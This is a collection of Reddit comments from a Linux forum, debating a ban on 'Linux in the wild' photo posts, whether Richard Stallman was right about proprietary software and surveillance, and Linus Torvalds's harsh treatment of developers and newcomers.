Whatever the clutter, (which I don't agree it is) I consider it Linux advocacy and enthusiastic support. I cannot consider it detrimental or in a negative light.  
It's like blah blah blah we already know
No
I absolutely support the ban. I come here to read interesting linux-related news and discussions and those posts are unnecessary garbage often upvoted to the top of the subreddit.
I would. Those posts are borderline zero content. And they certainly don't encourage any kind of discussion.
So many people in this sub sound like they'd be very fun to talk to at parties... 
I get marginally more annoyed at the many posts of people posting their desktops more than I am annoyed at Linux in the wild posts. That being said I don’t understand why they should be banned when you can easily scroll past or filter the fluff 
I don't remember who first said it, but it's incredibly relevant:

"Linux in the real world? Are you blind? Linux *is* the real world."
Please!
/r/linuxinthewild make it happen someone.
Why not have fun?
As long as Microsoft, Apple, and Google spend however many times more on advertising than Linux can, I figure it's a fair trade. 
I find the posts amusing, so, no.
Its 100% bullshit
All the posts here are some sort of variant on Linux, and haven't we all seen Linux posts before? Honestly I think all subreddits should be permanently locked forever to prevent this internetish scourge of repeated content.
/r/itsaunixsystem
[deleted]
Honestly, yeah. Unless it's something truly unexpected, seeing the gazillionth embedded device booting or running Linux gets extremely boring.
Yes, please. They're almost as bad as people who just post pictures of boxes on the PC subs. 
thats gonna be a yes from me dawg
Yeah they belong in /r/linuxmemes
maybe as a sticky thread every few months, if anything? it's cool and I sometimes take a picture, but I don't usually bother to post it anywhere.
No.
100% on board. unless it's linux on an unsupported board of course
I unsubbed from the raspberry pi subreddit because of this issue. If it were 1990, then sure, but Linux is everywhere, we get it, don't need to see a photo of it.
[deleted]
Sure
Would /r/mildlyinteresting be a better place?
The posts per se are quite useless but sometimes they can sparkle some interesting comments or discussions, I would still allow at least one per month.
yup. yawn
The valuable seconds they waste in my life can never be replaced. 
/r/debianinrandomplaces

Already exists and fits the need. And it is not JUST for Debian
Yeah, I'd be down with it. It's the same as people constantly posting pictures of their PCs and or parts in other pc subreddits. It's boring and brings nothing new to the discussion. 
I think the sub is fine how it is. 
No.  Why don't you not click on such posts?
Hi All,

I’d just like to throw this out there: Richard Stallman was right all along. Before today, I thought he was just a paranoid, toe jam eating extremist that lived in MIT’s basement. Before you write me off, please allow me to explain. 

Proprietary software phoning home and doing malicious things without the user knowing, proprietary BIOS firmware that installs unwanted software on a user’s computer, Government agencies spying on everyone, companies slowly locking down their software to prevent the user from performing trivial task, ect.

If you would have told me 2 years ago about all of this, I would have laughed at you and suggested you loosen up your tin foil hat because it’s cutting off circulation to your brain. Well, who’s laughing now? It certainly isn’t me.

I have already decided my next laptop will be one that can run open firmware and free software. My next cell phone will be an Android running a custom rom that’s been firewalled to smithereens and runs no Google (or any proprietary) software. 

Is this really the future of technology? It’s getting to be ridiculous! All of this has really made me realize that you cannot trust anybody anymore. I have switch my main workstation to Linux about 6 months ago today and I’m really enjoying it. I’m also trying to switch away from large corporations for online services.

Let me know what you think.
[deleted]
I've always liked RMS, and digged what he says. But the truth is, I just don't have the testicular fortitude to forgo, like, everything, like he is. 

The thing about RMS is that he is always right in the end, people eventually realize it. Then new people show up and have to learn that themselves over time again. 
You forgot to mention CPU microcode and all sorts of firmware present on most Linux systems.
This is not the future of technology, this is the present. Intel processors need [a separate processor](http://www.coreboot.org/Intel_Management_Engine) that on newer architectures have full access to the system's RAM and runs [its own TCP/IP stack](https://en.wikipedia.org/wiki/Intel_Active_Management_Technology#Communication) separated from the OS. The code is proprietary of course and must be signed by Intel. Whenever someone caughts [a vulnerability](https://en.wikipedia.org/wiki/Intel_Active_Management_Technology#Known_vulnerabilities_and_exploits) we need to trust Intel to patch it; but the process of updating the firmware is so obscure that users don't even have a concern about it. Coreboot developers have little hope of reverse engineering this stuff - and even if they did, by the time it works they will have support for something made years ago.

A [similar situation](https://en.wikipedia.org/wiki/Baseband_processor#Security_concerns) happens with baseband processors of cellphones, that usually have full access to RAM. An indiegogo was created to fund [a fully free software stack](https://www.indiegogo.com/projects/free-software-cellular-baseband#/story) on a baseband processor. It raised 2301 dollars.

But don't worry, the future will likely be much worse, and even less people will care about it.
I've been a programmer for around 30 years, more or less depending upon how you define programmer. (My first paid gig was about 28 years ago.) As soon as I found out about free software in 1993, I immediately started using it. My home programming environment has been exclusively Linux since 1994, and my work environment has been exclusively Linux since 1999. I have interacted with most of the principals in the movement, especially in the 1990's when I was more active.

Over those 20 years or so I've heard countless negativity directed towards Mr. Stallman. The measure of a man is not how much he is loved during his lifetime but what he contributes to the society. In the case of Mr. Stallman, his most important contributions have been telling it like it is, pointing out things most people are oblivious to that are apparently obvious to him. That is the measure of a genius.

A smart man will continually tell you things that you've never heard before. A lucky man will occasionally guess correctly. A genius will tell you things that people aren't yet thinking about that prove to be correct over time.

Programmers are bright people. Let's face it. We're some of the smartest people on Earth. But Mr. Stallman's intellect shines particularly brightly among our group. Listen closely to what he is saying. He doesn't say things for his own health. Quite the opposite. He doesn't care if he offends you. He is trying to make you think.
Stallman has always been right.  It has always been a matter of determining your personal ability and willingness to adopt his prescriptions given your circumstances.  

As states/corporations become (almost unavoidably) hyper-exploitive in their efforts to monitor, understand, manipulate, and control their populations, and as public awareness of this grows, more people realize that it's worth a little effort and adaptation to preserve their privacy and humanity.

I truly believe that Stallman, and others in the free technology movement, are among the most important figures in contemporary times and that we all owe them a great deal of gratitude.
That's what I dislike about RMS, he's almost always right.
In order to separate yourself from online services you have to run several servers to make up for the convenience, or lose the convenience all together. It can easily become a hobby if you're not careful, some people want it to be, others not.
The time of the  radicalization of the geek is upon us.  Free software and GPL is the future.!!
Of course he was right. 

Randall Monroe beat you to it: https://xkcd.com/743/
STALLMAN WAS RIGHT! Won't be long before we start seeing this slogan spray-painted on walls, and in comic sans font on a t-shirt.

Funnily enough, your description of him is apt. I saw him give a talk in London several years ago, and his social skills were somewhat lacking. He was literally coding barefoot on stage, totally ignoring everyone until he was called to speak.

Incidentally, I'm three months into using Linux on my workstation, and I love it. My next phone will be UbuntuOS, I think.
I've met him, asked for a picture and he agreed. Even though he said he'd never use a smartphone, it was nice of him to allow me to. But it was also inspiring that he can stand in the face of giants and still say no to all their glitter.
There are lots of people who recognized this.... just not many that react like Stallman. He is an extremist, but he is also working extremely hard to change it. 
[deleted]
I've always wanted to be part of the free software movement but I don't want to do it from home I want to actually try and make a platform that is Free and transparent about it's operations. I think there is a place for a Free hardware platform it is just not a maintainable goal for a single person in the long term. There is a reason intel is a multi-billion dollar company, they need that capital to be able to sustain the progress that they are making and they feel that Free and open aspects of their platform would threaten their current hold on the gross majority of the market. Many companies that design silicon no longer are invested in the platform but rather the features running on said platform (see nVidia), they can design a single die and spin it 3 or 4 different ways so there is no reason that they would show you how that die works if it would allow you to modify the product to get more performance out of a lesser binned product for example. 

I believe a company in the market of designing FREE chips and hardware platforms would be profitable only if there is strict enforcement of GPL otherwise companies will just fork your project spin some boards and slugs and tell you to go fuck your selves while they spin 40,000 boards in china an sell them with no R&D cost.

*edit: a word.
I'll argue that the FSF - and the GNU project in particular - is one of the greatest forces for good in the computer industry today.  The GNU userspace enabled Linux to be a useful system - building a kernel *and* a userspace is far too big a project to take on in a single hit.  

Android would not have existed with out free software - on a number of levels free software has been somewhat effective in keeping the I.T. industry honest.  Microsoft has (for example) been forced to toe the line with CIFS and provide support to the Samba team.  Oracle is publicly moaning about people running code analysis software on their products, and is enjoying the Streissand Effect because of it.  IBM now produces a fairly large amount of open-source software, of which perhaps the best known is Eclipse.

The current row about security and backdoored network infrastructure has brought a sort of public focus on the issue.  Free-as-in-speech software is gaining a lot of wider public attention as it has a unique selling point that is impossible for closed-source software to emulate.

RMS was right and he is a 'force for good' - not just for his advocacy work, but for practical work such as the GNU project.

I hope one day laptops or computer come with a badge saying "open firmware" etc. Would be my deciding factor to buy things.

Do you think Intel could have backdoor too?

Another thing how can hardware be fully open? Like these companies invest big bucks in developing firmware, hardware, manufacturing plants etc to make the device available to us. Why would a manufacturing plant want to open everything about what they do?

It's like telling Microsoft or Apple to open source IPhone hardware on which they invested shitton of money on it. Making it opensource would make their competitor easy job to replicate and make something better. 

But I just realized when writing this,
They invest in making the hardware, they own it. But if you buy it, do you own it? Or do you partially own it? 

Man this is tricky.

From [The Register article about Lenovo's most recent debacle.](http://www.theregister.co.uk/2015/08/12/lenovo_firmware_nasty/)

"Richard Stallman is sounding less and less crazy with discoveries like this," noted another Hacker News poster, referring to the Free Software Foundation supremo who has warned for decades that we're losing control of our computers.
RMS is not popular, but he is right.
If default uploading of data, metadata, and analytics is the accepted "norm" now, I'm highly concerned for the coming years.
I like Stallman and I respect him even though he is an extreme personality. I can not make the commitment and stick to it like he has/does. The willpower of philosophy over practicality is impressive and respectable. I wish I could make such a commitment and have the willpower to stick to it . . . sadly I can not.
>My next cell phone will be an Android running a custom rom that’s been firewalled to smithereens and runs no Google (or any proprietary) software. 


Lol, good luck getting an open radio driver.
> My next cell phone will be an Android running a custom rom that’s been firewalled to smithereens and runs no Google (or any proprietary) software. 

Ah hah haha hah ha ho ho ho hee hee hee hah ha ha ha 



he's a good guy, he could have used a pr rep or a mouthpiece earlier on though 

im always looking forward to seeing what he does haha
Hi Buddy you should check out 
https://prism-break.org/en/
I'm new here, but we're in a sorry state of affairs if a linux forum has people asking not to be written off for defending RMS.
Richard was always right about the broad strokes. We knew this in the mid '80s. But we also knew that he was ... a bit prone to over-generalizing and to absolute statements where the reality was more subtle.

We should have been more on guard about how much control we had over our software.

The good news is that we can still build our own computing platforms out of commodity parts, and real open source computing continues to thrive in the micro-platform world of Arduino and similar efforts. We don't have to accept the status quo, but the status quo has mostly won the hearts and minds of the general public.

Of course he's "right", many of us have always known that. It's just not feasible for most people to live "off-the-grid" like he does. I like social networks, and having mobile internet access makes my job so much easier, traffic-aware navigation means I can spend less time driving to jobs, my family likes when I share photos with them on Facebook. We make certain compromises for convenience, but it's still possible to be safe.
It's just he beginning...

It's nearly impossible to not buy a smart TV any more, and you can't install custom firmware on a smart tv, so it does what it wants to, and that's not always good as we've seen in the past.

the IoT is comming, proprietary OSes are comming to every device you will own. They will be connected to the internet without you having any control over it...

Welcome to the future.
If it's not illegal, and it earns money, someone *will* do it.  Heck, this still applies if the activity is *ill*egal and there's a decent chance that nobody will find out.
I totally agree while you are speaking of privacy infringement and malicious software/program. But, most importantly, the point is Richard Stallman is right, not because of his preference of topics and subjects, but specifically because he is highly concerned about our private life, I mean, OUR LIFE, not some company's business, or BIG.DATA. I mean, not only Facebook, but Apple, Google and most of big vendors and ISPs are commercializing our information and choices on the Internet, then making a highly-controversial marketing, and this is actually disgusting. I mean, how dare you? You exist because of me, and because of all of US, and We as the consumers, and the users, can give you a lesson, and that's why, that's courageousness always make me a fan of Richard Stallman. Thank you Richard, thank you for your effort. 
If you care about this stuff may want to keep in mind Linux is the only operating system that does not encrypt software channels. This exposes security-relevant metadata (installed software, version numbers) to those agencies copying internet traffic as it flows across the internet backbone. 

When I researched it I found that Fedora's basically the only distro that encrypts the connection thus preventing this. With glaring security holes like this it makes me wonder what else has gone unfixed. I doubt we are truly as secure as we think even when using the de facto best OS. 



I think Microsoft are mad for automatically running binary code that lives in the platform firmware.  I mean, it's not like Authenticode sigs are exactly hard to get (or steal) for the bad guys, and it seems to be a solution without a problem.  It's almost like they sat down and said "hey, how do we make it easier to build a rootkit?  Let's do _that_."
>If you would have told me 2 years ago about all of this, I would have laughed at you

windows has been criticised for this for at least 15 years. but people seem to have forgot the reputation microsoft had back then
RMS found a monkey paw and his wish was to see the future but his curse is that nobody believes him.
>please allow me to explain. 
>
> ...
>
>If you would have told me 2 years ago about all of this, I would have laughed at you and suggested you loosen up your tin foil hat because it’s cutting off circulation to your brain.


You didn't do any explaining of why 2 years ago you would have thought that a list of things already commonplace was 'tin foil hat' material, other than your impression of an ostrich with it's head in the sand.


Not to sound smug, but how could anyone doubt that these massive corporations, which are keen to how much money there is in selling user data, would not start to do nefarious things such as collecting it without user knowledge and forcing software down our throats which provides telemetry about the user?  Following the Snowden NSA revelations, it's not a far stretch to assume that some of these measures are to be used for geolocation and as breadcrumbs that may signify intent to engage in or interest in "terrorism" and/or other government-unfriendly activities.  Consider that nearly every SaaS/cloud/insert-tech-term-here company is under gag order and cannot provide information about what the government has asked them for, nor where the government has their fingers in their operations.

Calling someone a paranoid, tin-foil-headed conspiracy theorist is easy.  Carefully considering another person's concerns is not.
[deleted]
Glad to see someone not licking corporate asshole on this subreddit. I agree with everything you say, and would like to add that corporations need to have a serious boot put to their necks.
[I'm fighting this battle for free software in the touchscreen point of sale world](http://www.viewtouch.com), which is a huge vertical market.  
Remeber "conspiracy theory" was a term created by the government to discredit people telling the truth.
I Use GNU/Linux because I like it not because I believe strongly in FOSS. In an ideal world I would love for all software to be FOSS. But I'm not going to lose my head because of some proprietary software. I really don't see a point in being anal about using FOSS and then use proprietary hardware.  I feel that is just as important to use FOSS software as I do to run libre hardware. So If I am going to run my laptop/desktop/homeserver on x86 hardware what's the point of being anal about proprietary software.
Just curious do you have a list of services you plan on changing to vs lets say gmail.
> Android (...) runs no Google (or any proprietary) software. 

you'll have hard time.~~you can fit all android open software on one a4 page:~~

~~https://en.wikipedia.org/wiki/List_of_free_and_open-source_Android_applications~~

you better buy nokia 3310 or ubuntu phone
I've been through this before and it's really difficult for me. On one hand I'm a technology enthusiast so I'm always interested in what's new and novel. However, I'm also politically a libertarian so I naturally have a soft spot for FOSS and everything it stands for; taking control of our computers out of the hands of corporations and handing it back to the users.

My problem is that my enthusiasm and my principles clash and contradict each other. I love things like the Google ecosystem where pretty much everything I do is backed up to my account and I can easily move from one device to another, I love Steam, I love OS X on my MacBook Air and I think Windows 10 is actually pretty neat in regards to it's attempts to converge the desktop and mobile computing platforms. But the problem is, all of this is proprietary software and that pains me because in terms of the functionality of the things I use, I really do think that represents the right future for technology.

As things stand I've become very accustomed to making use of these services and in the past when on multiple occasions I've tried to ditch as much proprietary software and services as I can, it just proves very difficult to do this as I have to find FOSS replacements for so many things and they don't always work as well.

It's like I'm quite happy to support FOSS on principle, talk about how good it is and extol the benefits to other people but I'm just not willing to fully commit to it myself because I just don't find it to be the most desirable option for what I want out of my computing experience.
As a consumer/developer, if there was a compelling device manufacturer that produced open hardware that ran open software and carried such quality in engineering as certain devices on the market today (such as my current development machine, a MB Pro), I would totally make the switch.

But the problem is that as a company, this concept of an "open device" is frightening. Everyone knows that it's very easy, if you publish plans and such, for another knockoff company to start in, say, China or Russia, and to steal your customers.  Plus, you have to actually give everyone what they want.

Regardless, I totally agree with RMS. He's 100% correct, but there's nothing that I can feasibly do to change things.  Other devices are much more attractive.
in many many ways rms has been right. 

unfortunately he is still crazy and has all sorts of interpersonal issues when dealing with people or the public. I'm not sure if it's a condition or just his personality.

so while right a lot of the time, his personality and abrasiveness  (and lack of hygiene from what I've heard) prevent him from being recognized or listened to by a lot of people.  it's unfortunate because like you said, he's right.

he's basically the technological libertarian spokesperson.
I just removed my Arch install and installed Windows 10. mostly so I could learn it.  I figure I'll be on it till the end of the year, and then move back to Arch.

The amount of phoning home that Windows 10 does it quite disturbing.  The fact that I can't turn telemetry off is really annoying.

And people keep saying that it's a trade off, because Windows 10 is free.  But it's only free for the first year to help speed up adoption.  After that, you need to pay for it.  Or if you're in Vista or older, you need to pay for it.  So, even if you fork over full price for Windows 10, you still can't stop it from phoning home.


There are two issues here.  The first issue regards what data governments collect and what they do with it.  This is a problem that is beyond my ken to discuss.  I hope governments do the right thing in collecting the data and handling it.  On the one hand, I'm an American and the words of Abraham Lincoln still move me to tears.  I believe in democratic systems as the best way to safeguard people's freedoms and liberty.  On the other hand, I know that there are malicious governments and malicious people employed by governments.  For these reasons, with regard to governments, I hope the people working for ours do the right thing.

The other issue regards unethical behavior on the part of corporations.  Corporations are so deeply insulated from inspection for the most part that they are free to act as they may, all in pursuit of profits.  I am more concerned with this threat than I am concerned with governments.  

It is with some irony that I note recent stories of US government officials email being read by foreign governments, notably China.  It is ironic not because they have fallen prey to the same things which afflict the citizenry, but because the solution for both cases is probably FOSS.

A robust program to provide secure computers to government could best be served by FOSS.  By bringing FOSS experts into the government sphere of influence, secure chips, BIOS, OS and apps could be constructed, all with open code reviews.  If the NSA or any other agency wanted to bug these computers, let them earn their salary the hard way.  For the people, we would have computers that are as secure as they can be made.
That's the tragedy of Richard Stallman. In the end he remains correct. However, in the mean time I have to get shit done and he's remain quite difficult to get along with. 

You might enjoy this talk, which mentions his ideas, work and compares him to Ghandi.
https://youtu.be/Uvf3ZQSNMhE
Of course he's right most of us knew already, but large part says he's crazy, or extremist, but he has to be extremist, otherwise nobody would listen to him, he's fight is admirable and he must stand strong, he needs to be an extremist or nobody would care.

We need to join the cause too, and spread the word.
>I’d just like to throw this out there: Richard Stallman was right all along. Before today, I thought he was just a paranoid, toe jam eating extremist that lived in MIT’s basement. 

Well he really is, but as Kurt Cobain said, "Just because you're paranoid.."
I find the repeated mentions of the eating something off his foot incident disturbing. So, okay, he did something weird and disgusting, but it doesn't really matter! Talking about it this much is basically making fun of him and making him look bad for no good reason. It's kind of like bullying!

If there were important ongoing problems like bad management of open source projects and the FSF, that would matter. It would make sense to keep talking about that. However, "toe jam eating" does not matter.

I feel very strongly about this. People perpetuating that meme are scum. What they're doing is much, much worse than eating stuff off your foot.


When was he wrong?

I'm never wrong. I once thought I was wrong, turns out, I was mistaken. - Unknown(Richard Stallman)
> My next cell phone will be an Android and runs no Google

oxymoron
He's right about the issues overall, but he's still a bit black/white.

Here's the deal:

* Proprietary software *does* give power over users
* Power is not *necessarily* abused
* Proprietary software has downsides in *all* cases but is more acceptable when not abusive than when actively malicious
* It is easier to *avoid* temptation than to *resist* it (credit: Dan Ariely), thus people with power *will* be tempted to abuse it and some will do so

In the end, we'd all be better off emphasizing software freedom a la RMS. But it's *still* not an issue that can be solved on an individual basis, it's a systematic social issue. We shouldn't blame people who use proprietary software (that would be victim-blaming), and we *should* acknowledge the difference between malicious and non-malicious proprietary software. But we *can't* trust that the non-malicious proprietary software will stay that way (except rare cases where we deeply trust the particular proprietors).
He cannot be trusted due to his involvement with Emacs.  <hiss> <spit>
> If you would have told me 2 years ago about all of this, I would have laughed at you

Two years ago I already knew he was right.
Was. Is. And Will Continue To Be.
I get that this is a revelation to you and congratulations for that but Stallman's been making these points for a long time and a lot of people have already known for many years that its not tinfoil hat paranoia. The information's been out there for a goodly while - maybe the general public hadnt caught on to it in the way they had post-Snowden - but certainly enough for anyone sufficiently motivated to ask 'is there any truth to this?' and get an answer.

Sorry I know this sounds snarky but anyone dismissing it as paranoia 2 years ago wasnt reading enough, and Id wager that a lot of people on this sub already knew that. I guess what im saying is, congrats on realising the lay of the land but of all the rooms to be bursting into saying 'guys,  have you heard...' this isnt the most useful one. Theres still a lot of people - consumers of technology rather than participants - who need to hear this, out there.
I've used Windows forever and ever. Then i upgraded to Win10. Then I started reading about all the tracking, keylogging, keeping the microphone on, and everything else. Two days after the upgrade, I reformatted and installed Ubuntu. I'm still learning, but so far it's been great.
[deleted]
Just because Stallman is right doesn't mean he isn't also a crazy extremist.
[deleted]
Richard Stallman moves the goalposts away from the extremists.  
I think extremist are the ones that insist on controlling the computer that YOU own!  
I think extremist are the ones that think everyone should be spied on all the time and justify it by saying
that everyone is a potential terrorist and thus privacy for the masses is dangerous, not to mention not nearly as
profitable for their friends.

1) There's no possible way to own a 100% free phone, that's why Stallman doesn't have one.

2) Linux is not always 100% free, choose free distros (the FSF has them listed on their website).

3) [Be aware of possible government backdoors on Linux](https://www.youtube.com/watch?v=7gRsgkdfYJ8). Also, [SELinux is encouraged by the NSA](https://www.nsa.gov/research/selinux/).

4) Stallman is left, not right.

You have a long way to walk, welcome to the ride (it never ends).
I'm still floored from Metal Gear Solid 2 accurately predicting of what the Internet and today's information age is like today...

I'm almost begging the Patriots filter out the dumb **** I see...

If you really want someone to mess with your head, read Jaron Lanier and his book We are Not a Gadget.  Don't agree with it all, but 50% of the book I'm just nodding my head.
> I have already decided my next laptop will be one that can run open firmware and free software.

Okay, but how will you control what the receiving party is doing with your info?

> My next cell phone will be an Android running a custom rom that’s been firewalled to smithereens and runs no Google (or any proprietary) software.

Same as above, how will you control the receiving end? Also, good luck with this bullet point. Seems like no small task.

Please don't take this post as me being dismissive or critical, it's not my intention. I'm genuinely curious how people can do business or any serious work these days by forgoing the most highly used pieces of tech. I can't imagine how my day to day would change for the more difficult and less productive. 
*GNU/linux
RMS is usually right. It's too bad more people don't listen.

Live free or die!
Consider a BlackBerry 
The simple answer is that anything that CAN be done with technology WILL be done with technology, whether you think it's moral, legal, acceptable, or otherwise. It's coming.  Be prepared.  Always. 
Cell networks can push apps to phones...
¡Viva la revolución!
>Before today, I thought he was just a paranoid, toe jam eating extremist that lived in MIT’s basement.

This is still pretty accurate: 
https://www.youtube.com/watch?v=I25UeVXrEHQ
Just because he's crazy, doesn't mean he isn't right.
Is there something that happened today to change your mind? Seems like that might be important enough to mention in your OP.
I smell an AMA request in the happening, amiright guys?
he was always right and is a really smart man  
but i won't call it GNU/Linux, it's just too much to write
I think you are right. And I think that the only choice is today is to opt out of the cycle. Don't want a smartphone that tracks you? Probably need to do away with that device. Don't like your cable company? Read a book. Don't like your politicians who do nothing for you? Fire them at the next election. 

Its really not that hard. At the end of the day what you are truly trading is convenience for all your personal info. Buy and endorse products that meet your criteria and do not buy those that do not. 
This was a man who believed in something.
Stuff like that happening at the device level does not concern me.  You can always change devices and software.  What DOES concern me is the stuff happening at the network level.  Companies trying to control the internet and charge tolls for fast lanes etc.  Packet filtering and lowering the QoS of Video streaming and VoIP because it competes with their products.  Things of that nature.
Even if you disagree with him, even if you *strongly* disagree with him, I just wish fellow techies/engineers/developers would show him some professional respect. I cringe everytime I see people dismissing him because of some silly photo or unfounded argument.  

Watch his presentations and you'll see that hes just a geek, far from being a nocive person.
I said this year's ago that any sort of software that is for privacy doesn't mean shit, on hardware its all owned. All being tracked and all data is being aggregated and stored. Get over it, privacy he's been over since 2000
He's [consistently](http://imgur.com/mqLdyzE) about [20 years](http://i.imgur.com/bnIq54u.png) ahead of the industry.
I prefer living my life and doing what I enjoy than worrying about building my own computer, smartphone, Internet, etc. just to not let corporations see my dog's photos or minimum wage bank statements.
Who needs Google, when you have DuckDuckGo :D
He was very right but at the same time very wrong. Complete opposition to proprietary software basically doomed his ideas because thats not how world works. If he pushed for open source code but that the same time more protections for vendors of proprietary software so they could still make money while keeping their code open world would be better place. Now we have island of free software which is often inferior to commercial products and we have liberated hardware that has capabilities of calculator. He wanted to have all or nothing but in a world full of different people and different interests there have to be compromises. Well now we can enjoy those low-end thinkpads. Yay..
[deleted]
It isn't that he wasn't right, in fact most people I know that think is he just a paranoid, toe jam eating extremist is because that is how he presents himself. That doesn't make him wrong.
RMS is grand and all until you realize even packages in Arch are forbidden. I hope you like  using Herd.

Good luck with that Android phone with its PROPRIETARY QUALCOM CHIP (radio) which is essentially a parallel operating system. Black box there.

There's a lot of merit to being paranoid, and OSS is valuable. But the stack is eventually out of your control -- e.g. Cisco/Juniper switches on telco hardware. That wifi router (even with TomatoUSB) and its hardware. Being flashable doesn't make it open.

Then, on top of all that, one might have a SO -- and good luck getting them to go full RMS.
One of you guys who have the knowledge should make detailed step by step guides on how to get laptop and phones to run custom bios and roms. For the rest of us who just probably will brick the hardware. Or else only experts have some semblance of privacy and noone is going to make hardware with custom firmware in mind.  But if it is easy and straightforward to do for any grandmother then it will be popular and a great selling point for manufacturers. 
I generally agree with Stallman, and I share your concerns. But Stallman wouldn't buy his son a videogame console (if he ever considered having a son) because they are proprietary. I think that's too much.

If the government is spying on us, that's not really because the software is proprietary. Sure, it helps. But change every computer to free software and they will find another way to spy on us. The fight is on another level, IMO.
Oh Jesus. Pass the lube its circle jerkin time.

EDIT: There are far more reasonable answers in here than I originally thought. Wow. Thanks guys.
I'm in the same position now. I just upgraded my gaming rig to win 10 but I think I'm going to scrap it and install Debian on it because of all of the privacy issues with windows 10. Its really disappointing the current state of some software right now. My laptop has been running Debian for the past couple years and that's been the main computer I've been using and I just love it.
i honestly believe when people look back from a thousand years hence Stallman will be one of the big names right beside the likes of Watt, Stevenson, Brunel, Aristotle, Voltaire, etc
[deleted]
my prediction? 3d printing might be the solution to proprietary devices. can't wait for it to swoop in and white knight consumers. 
Yep.

Stallman is annoying. He frequently says extreme things that would make anyone sound completely bonkers.

But he has this tendency to be right more often than not.
Sadly at this exact moment in time all we can do is mitigate, and start work on a better system for tomorrow. Will we ever be rid of it all? Who knows.

I have to say though I run my own servers, and use the cloud as little as possible totally worth the time and effort the power you can have with your applications is amazing
It's not far fetched at all. You centralize communication, through ISPs, etc, and you're welcoming surveillance.

I'd be surprised if there was a time when it wasn't a thing.
I totally agree with you. 
as someone who is using linux & oss for 15+ years: this has been a clear trend and pretty obvious. still, I don't think this is so bad as you think. there is a lot of good things behind managed cloud-enabled services. users will like it, because it makes them more productive. there is no going back any more. 

what has to change is the politics, and that's nothing a GPL or RMS can do. 
I've always believed in his perspectives, but the war was lost before he ever began fighting.  Your firewall-my-life approach is probably a little overboard unless you *really* have something to hide, but it's good to be attuned to all of those methods, equipment, and skills just in case things really go south someday.  As it is, I tend towards approaches with a reasonable expectation of *respected* privacy by those who might be interested in me.  That includes script kiddies, botnet administrators, etc...  Essentially, any position of modest power granted by skill or authority that might be occupied by folks who lack integrity...
This is an interesting book about his personal life and the history behind GNU, GCC, etc.  I believe the entire thing is [online here](http://www.oreilly.com/openbook/freedom/).
Edit: Linus yells at people when they are wrong. Eg: recent kernel regression debate. r/linux yells at newbies with no reason.  
Please stop replying with "you retard?" to a Linux newbie's question.
Linus also doesn't yell at newbs.  If he's tearing into you, it's because he thinks you should know better.  He may or may not be right in the latter regard, but the man doesn't scour the mailing lists looking for people to yell at.
On this topic, if you are a novice, but scared to ask because Linux people are dicks, send me a message.  Newbie friendly, will show you the light.
Torvalds has been interviewed on this and said exactly that. He's yelling at people who he THOUGHT HE COULD TRUST who have let him down. There's hundreds of people under dozens of subsystem maintainers being fed bug reports by THOUSANDS of people about software used by MILLIONS of people on BILLIONs of devices.... And the project has got his name on it.... It's his life's work, damn fuxking right that he yells at people for fuckling up.

He also said that being vocal about his wishes helps him vent, makes for a VERY clear environment with regards to expectation.

To be clear in the latest breaking issue his principle wasn't even really that userspace was broken, it was that the responsible party shrugged it off as something they could parch-around in userspace instead of fixing the kernel regression. Given that the kernels #1 motto is "we don't break userspace" that oißed him off even more.
More importantly, newbies aren't well known Kernel devs. 

A Kernel dev has already to be very good. If Linus yells at them, it is because everybody knows they can do better. 
[removed]
I have been following Linux communities for almost 20 years and this has always been a problem.  There is a fairly large subset of eletist s who come off like they don't want normal people in their at ground.

They bitch because you ask questions that were asked before (that often never got answered or are outdated in their answer)

They bitch because you didn't use the forum's shitty search when looking for an answer.

They bitch because you don't already know the answer and aren't an expert.

They bitch because you want to know if there is an easier way of doing things that doesnt involve knowing a thousand cryptic KB combinations.

Basically they are vocal and assholes.  Frankly it kind of feels like part of the reason Linux still has never gotten anywhere on the desktop.
Steve Jobs and Bill Gates were enormous assholes.  Just another good aspect of open source, mailing lists tirades are public too.

Linus is a saint compared to those two.
Showerthought: I don't think you know how showerthoughts work.
Which distro will get me laid?
Torvalds > Stallman. Remember when he tore into that kid for asking a "Linux" question instead of a "GNU/Linux question"?


On the counter, "newbs" (or anyone) shouldn't be rude either and assume other people have a responsibility to work for them.

[How To Ask Questions The Smart Way](http://www.catb.org/esr/faqs/smart-questions.html) should be a mandatory read.  
The Gentoo guys are allowed to be the nasty fucks they are, though. They were rude. They made me feel small, and terribly stupid. They knew that was the only was to make me see I was not. 

That being said, the Ubuntu guys are nice, but still act like Linus whenever they can, but still hold up the welcome banner to all the noobs. 
I once was helping cutting down trees for a neighbor.   The neighbor also had a friend of his that was a retired professional lumberjack and had spent his entire life in the lumber industry.

I, apparently, had never learned how to do a plunge cut properly.  I have spent my entire life on or around farms, learning farming things, and I learned to cut down trees on a farm.  Apparently, I learned how to cut down trees wrong.  (After spending about 8 hours watching youtube videos and reading, whatdaknow, the retired lumberjack was right... I was trying to kill myself apparently :-) )

I started cutting down a tree, he took a look at what I was doing, and started yelling at full force at me.  He wasn't unhinged, but he meant every word he was saying, and he was saying it so that I would never forget it.  I knew he wasn't being "mean", but he sure as hell sounded like it if you were sensitive to such things.

The neighbor's wife started trying to play mediator and defend me.  I took one look at her and said, "Neighbor, he's doing what he should be doing.  He's trying to keep me alive.  It's serious enough that he **should** be yelling at me."

Yelling isn't the problem.  Yelling is a different form of communicating, and **should** be used when the circumstances are serious enough to warrant it.

Problem #1  Some people are upset by someone yelling.  People who are upset at someone yelling at them or in front of them should stop trying to do jobs that have serious enough consequences that it requires someone to yell.  You obviously aren't ready to take on the responsibility of a job with that level of ramifications.

Problem #2  People who yell for minor stuff.  If someone yells at you because you took a bathroom break, or someone yells at you because you didn't capitalize properly in the comments on your code, the yeller is an idiot, and it's perfectly sensible to let them know that.   

Linus doesn't have problem #1 (EVERYTHING about the Linux kernel is bloody f'in serious, if you want to work on the kernel, put on your big boy pants and stop wetting them because someone wants you to treat it with that level of seriousness), and Linus doesn't have problem #2 (I haven't heard anyone say that Linus yells at anyone without sufficient need).

Yes, people that work on the kernel aren't cutting down trees, with the possibility of killing themselves or someone else when they drop a tree wrong.

The Linux kernel is even more serious than that.

Linus should yell.  We should all be thankful that he does, and that he care that much for all of our benefits.
I don't think he's really that rude.    He's just using harsh language to focus people's attention.   Managing any software project with more than a couple of programmers is like herding cats.     I don't even want to think about how epic and downright Sisyphean a task  managing the kernel is.


Also, Linus is a dick to developers who should know better.  Those are not newbies.
I get what you say and you're right for most of yhe posts, but TBH that "apt-get install Microsoft Visual C++ 2016" deserved that.
It's a sad reality that there are a lot of insufferable Linux users on Reddit, forums, IRC, etc.

I'm part of many tech communities, and the Linux one is truly one of the worst.

